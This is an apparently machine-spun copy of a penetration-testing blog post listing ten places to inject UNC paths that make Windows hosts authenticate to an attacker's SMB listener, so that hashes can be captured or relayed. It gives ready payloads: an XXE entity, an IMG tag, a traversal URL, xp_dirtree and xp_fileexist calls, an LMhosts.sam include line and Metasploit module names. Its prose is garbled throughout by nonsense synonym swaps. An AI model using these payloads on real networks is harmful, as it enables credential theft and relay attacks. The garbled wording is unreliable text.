10 Places To Stick Your Unc Path

Recently at that spot was a big fuss over the "Redirect to SMB" spider web log that was divulge past times Brian Wallace. Personally, I intend that the recent scare over this vulnerability is a piddling overstated, but it could locomote a useful means to capture an SMB hash. I was already inwards the physical care for of putting together this list, thus here's a bunch of other ways that you lot tin forcefulness a UNC path in addition to capture credentials.
UNC paths are i of my favorite things to job during a pen test. Once I forcefulness an concern human relationship to authenticate to me over SMB, I convey ii options: Capture in addition to Crack the hash or Relay the hash on to approximately other computer. Plenty has been written virtually both options, thus nosotros won't comprehend that here. The methods outlined below should give you lot approximately options for where you lot tin job UNC paths to forcefulness authentication dorsum to your attacking box. Firewall rules in addition to file restrictions tin actually mess upwardly approximately of these, thus your mileage may vary.
For exhibit purposes, nosotros volition locomote using "\\192.168.1.123\test" equally our listening UNC path / SMB server.
Here's a linked table, if you lot desire to straight boundary to i of these:

• XML External Entity Injection
• Broken IMG Tags
• Directory Traversals
• Database Queries/injections
• File Shares
• Drive Mapping on Login
• Thick Applications
• The LMhosts.sam file
• SharePoint
• ARP spoofing - Ettercap filters

Honorable Mention:

• Redirect to SMB

1. XML External Entity Injection

External entity injection tin locomote a really handy means to read files off of a remote system, but if that server happens to locomote a Windows system, you lot tin utilize a UNC path.

<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]> <foo>&xxe;</foo>

Antti Rantasaari from NetSPI has been doing approximately actually cool operate inwards this space, thus cheque out his blogs for to a greater extent than info.

2. Broken IMG Tags

Using a UNC path for an IMG tag tin locomote pretty useful. Depending on where your SMB listener is (on the internal network) in addition to what browser the victim is using (IE), there's a adventure that the browser volition only ship the hash over automatically. These tin also locomote embedded anywhere that may physical care for HTML (email, thick apps, etc.).
"Internet Explorer's Intranet zone safety setting must locomote laid to Automatic logon exclusively inwards Intranet zone. This is the default setting for Internet Explorer." (Source)

<img src=\\192.168.1.123\test.gif>

3. Directory Traversals

I wrote virtually this a patch back, but spider web applications that allow you lot to specify a file path may locomote vulnerable to UNC path injection. By inputting a UNC path (instead of your typical ..\..\ or C:\ directory traversal),  you lot may locomote able to capture the credentials for the service concern human relationship that runs the spider web application.
Change the Id parameter inwards this URL:

• http://test.example.com/Print/FileReader.aspx?Id=/reports/test.pdf&Type=pdf

To this:

• http://test.example.com/Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf

4. Database Queries/injections

My co-worker, Scott Sutherland, wrote virtually using built-in SQL server procedures to create SMB relay attacks. This i tin locomote actually handy if you lot convey databases that allow the "domain users" grouping to authenticate. It's surprising to come across how many database servers are running amongst domain admin service accounts. Just job the xp_dirtree or xp_fileexist stored procedures in addition to betoken them at your SMB capture server.

xp_dirtree '\\192.168.1.123\'

xp_fileexist '\\192.168.1.123\'

There's a bunch to a greater extent than SQL procedures out at that spot that you lot could potentially use, but these ii are pretty reliable. Anytime you lot tin read a file inwards SQL, you lot tin in all likelihood job a UNC path inwards it.
This laid on also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module tin create it in addition to there's a great spider web log virtually Oracle SMB relay on the ERPScan blog.

5. File Shares

If you lot convey write access to a file share, you lot convey a couplet of options for getting hashes.

1. Here's a great i from Mubix - Modify the path for the icons for .lnk shortcut links to a UNC path
2. Microsoft Word documents tin also locomote modded amongst Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC pathes into the documents.

6. Drive Mapping on Login

This may locomote overkill, but it could locomote handy for persistence. By modding whatever scripts used to map network drives for users, you lot tin add together your ain UNC path inwards equally an additional travail to map. This is handy equally whatever users who convey this travail added volition ship you lot credentials every fourth dimension they log in. If you lot don't convey rights to overwrite the starting fourth dimension upwardly scripts, GDS Security has a dainty blog virtually setting this upwardly amongst Metasploit in addition to spoofing the starting fourth dimension upwardly script server.

7. Thick Applications

Basically anywhere that you lot tin enjoin an app to charge a file, you lot potentially add together inwards a UNC path. We convey seen many file upload dialogs inwards thick applications that allow this. This is fifty-fifty amend amongst hosted thick customer applications that are running nether the context of a final server user (and non the application user). This tin also locomote actually handy for kiosk applications. For to a greater extent than thick app breakouts, cheque out Scott's "Breaking Out!" blog.

8. The LMhosts.sam file

Mubix has a couplet of great UNC tricks inwards his "AT is the novel black" presentation. I already called out the .lnk files upwardly above, but past times modifying the LMhosts.sam file, you lot tin sneak inwards a UNC path that forces the user to charge a remote hosts file. Here's a sample LMhosts.sam using our UNC path:

192.168.1.123    netspi #PRE #BEGIN_ALTERNATE #INCLUDE \\netspi\test\hosts.txt #END_ALTERNATE

9. SharePoint

On many of our pen tests, nosotros larn access to accounts that tin edit everybody's favorite intranet site, SharePoint. Using whatever of the other listed methods, you lot should locomote able to drib files or conduct UNC links on the SharePoint site. Just brand certain you lot larn dorsum in addition to construct clean upwardly the page(s) when you're done.

10. ARP spoofing - Ettercap filters

There are tons of fun things that you lot tin create amongst Ettercap filters. One of those things is overwriting content amongst UNC paths. By injecting a UNC path into someone's HTML document, clear text SQL query, or whatever of the protocols mentioned inwards a higher house you lot should locomote able to larn them to authenticate dorsum to your attacking machine.

Honorable Mention:

11. Redirect to SMB

For what it's worth, this upshot has been out for a really long time. Basically, you lot larn your victim to view your malicious HTTP server in addition to you lot 302 redirect them to a UNC file location. If the browser (or programme making the HTTP request) automatically authenticates, in addition to thus the victim volition ship their hash over to the UNC location. Some of the methods inwards a higher house (See XXE) allow for this if you lot job an HTTP path instead of the UNC path.

Conclusion

I'm certain that there's a couplet that I missed here, but experience costless to add together them inwards the comments.